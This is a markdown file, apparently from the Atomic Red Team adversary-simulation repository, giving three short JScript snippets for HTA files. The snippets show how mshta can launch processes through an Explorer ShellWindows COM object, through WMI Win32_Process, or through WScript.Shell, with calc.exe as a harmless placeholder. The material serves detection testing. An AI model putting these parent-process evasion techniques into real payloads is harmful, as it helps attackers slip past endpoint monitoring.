security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
08fddb39402c8e39a8ef25b5dafaa0777d40c6dc
atomic-red-team/ARTifacts/Initial_Access/hta.md
T
Michael Haag b51284297d Initial Access - Atomic Friday July 2019 (#530) 
Adding the following:
- New DragonsTail Chain reaction that does not execute Mimikatz.
- Generic .HTA file with supporting markdown file highlighting details.
- Generic `Atomic.doc` with supporting markdown file highlighting embedded macro.
- Guide (markdown) explaining how to zip files to simulate email borne threats.
- Simple guide on how to setup a "Listener" for C2 communication in Python and Powershell.
- Generate-Macro.ps1 - Builder script that will generate 8 different macro embedded XLS files to simulate macro techniques actively being used.
2019-08-28 11:38:26 -07:00

44 lines
1.3 KiB
Markdown
Raw Blame History

# HTA
## AtomicHTA
Three ways to spawn calc using HTA. Each are customizable to download a chain reaction to perform additional behaviors.
## MSHTA - Explorer Spawning CMD
Using COM objects, mshta runs with no child processes. Explorer.exe spawns and executes cmd -> calc.
```
// Type One
// Child of Explorer, cmd.exe
var ShellWindows = "{9BA05972-F6A8-11CF-A442-00A0C90A8F39}";
var SW = GetObject("new:" + ShellWindows).Item();
SW.Document.Application.ShellExecute("cmd.exe", "/c calc.exe", 'C:\\Windows\\System32', null, 0);
```
## MSHTA - Wmiprvse Spawning CMD
Using COM objects, mshta runs with no child processes. Wmiprvse spawns and executes cmd -> calc.
```
// Type Two
// Child of wmiprvse
var strComputer = ".";
var objWMIService = GetObject("winmgmts:\\\\" + strComputer + "\\root\\cimv2");
var objStartup = objWMIService.Get("Win32_ProcessStartup");
var objConfig = objStartup.SpawnInstance_();
objConfig.ShowWindow = 0;
var objProcess = GetObject("winmgmts:\\\\" + strComputer + "\\root\\cimv2:Win32_Process");
var intProcessID;
objProcess.Create("cmd.exe", null, objConfig, intProcessID);
```
## MSHTA spawning CMD
Mshta spawns child process of calc.exe.
```
// Type Three
// Child of mshta.exe
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
```
Reference in New Issue View Git Blame Copy Permalink